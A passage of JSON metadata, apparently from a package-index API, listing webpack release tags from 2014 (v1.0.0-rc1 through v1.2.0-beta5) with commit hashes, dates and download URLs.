dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/